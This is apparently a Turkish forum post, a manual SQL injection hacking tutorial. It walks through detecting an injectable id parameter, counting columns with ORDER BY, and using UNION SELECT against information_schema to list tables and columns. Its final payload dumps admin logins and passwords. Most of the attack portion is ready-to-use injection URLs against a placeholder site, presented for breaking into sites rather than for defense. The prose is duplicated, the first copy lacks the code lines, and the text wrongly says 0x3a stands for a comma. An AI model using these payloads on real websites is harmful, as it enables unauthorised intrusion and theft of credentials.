#5 l SQL İnjection Manual Hacking
Konu : // SQL İnjection Manual Hacking // AquieLL
Başlayalım...
Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna " 'a " Ekliyoruz.
Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir.
Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye "+order+by+ "
Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır.
Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ;
Böylece Kolon Sayımızın 4 Olduğunu Bulduk.
Şimdiki Aşamamız Siteye "+union+all+select" Komutunu Çalıştırmaktır.İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani ;
Şurada Kolon Sayısından Sonrasına : (Yani 4'den Sonrasına) " -- " Koyuyoruz.
İD Değerinden Öncesine : ( Yani İD=1'den Öncesine " id=-1 "
Şimdi Ekrana Bir Sayı Çıkacak.Mesela 2 Sayısı Ekrana Geldi Site URL'mizde ;
2 Sayısının Yerine = group_concat(table_name)
Url En Sonuna'da = +from+information_schema.tables+where+table_schema =database()
NOT:Ekranda Sayıları Gördükten Sonra " -- " ve " - " İşaretlerini Siliyoruz.
Yani ;
Ekrana Tableler Gelicek,Bize Şuradan admin,adminuser gibi tableler Lazım olucak,mesela admin seçelim..
Şimdi Sitenin Sonuna Yazdığımız Kodu Şöyle Değişelim:
Şimdi Tabloları Hacklemek İçin Bir Site'den Yardım Alacağız
Site: https://www.easycalculation.com/ascii-hex.php
Hacklemek İstediğimiz Tablo İsmini String Bölümüne Yazıyoruz.Admini Seçtiğimiz İçin Biz Admin Yazacağız. Yazdık Ve Bize kodu Verdi.
KOD : 97 100 109 105 110
Bizim Seçdiğimiz Table admin Tablesi Olduğu İçin Kod Şöyle Oluyor.
Not:Şunuda Söyleyelimki login ve pass Arasında Yazdığımız 0x3a "," demek Ve Onu Mutlaka Yazmalısınız.
Ve Son Kodumuzu Yazıyoruz ve Admin Bilgileri Ekrana Geliyor... ;
ve TAM Siteli Olan Hali ;
Başlayalım...
Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna " 'a " Ekliyoruz.
Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir.
Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Kod:
www.örneksite.com/hack.php?id=1
Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır.
Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ;
Kod:
www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+4 (SQL Hatamız Kalktı.
Kod:
www.örneksite.com/hack.php?id=1+order+by+5 (Hala SQL Hatası Var)
Şimdiki Aşamamız Siteye "+union+all+select" Komutunu Çalıştırmaktır.İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,2,3,4
İD Değerinden Öncesine : ( Yani İD=1'den Öncesine " id=-1 "
Kod:
www.örneksite.com/hack.php?id=-1+union+all+select+1,2,3,4--
2 Sayısının Yerine = group_concat(table_name)
Url En Sonuna'da = +from+information_schema.tables+where+table_schema =database()
NOT:Ekranda Sayıları Gördükten Sonra " -- " ve " - " İşaretlerini Siliyoruz.
Yani ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()
Şimdi Sitenin Sonuna Yazdığımız Kodu Şöyle Değişelim:
Kod:
+union+all+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(hacklenmiş table kodu)--
Site: https://www.easycalculation.com/ascii-hex.php
Hacklemek İstediğimiz Tablo İsmini String Bölümüne Yazıyoruz.Admini Seçtiğimiz İçin Biz Admin Yazacağız. Yazdık Ve Bize kodu Verdi.
KOD : 97 100 109 105 110
Ve Artık Site Sonuna Yazacağımız Kod Şöyle Oluyor ;
Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+seçdiğimiz table--
Not:Şunuda Söyleyelimki login ve pass Arasında Yazdığımız 0x3a "," demek Ve Onu Mutlaka Yazmalısınız.
Ve Son Kodumuzu Yazıyoruz ve Admin Bilgileri Ekrana Geliyor... ;
Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--
ve TAM Siteli Olan Hali ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin-
Yorumlar
Yorum Gönder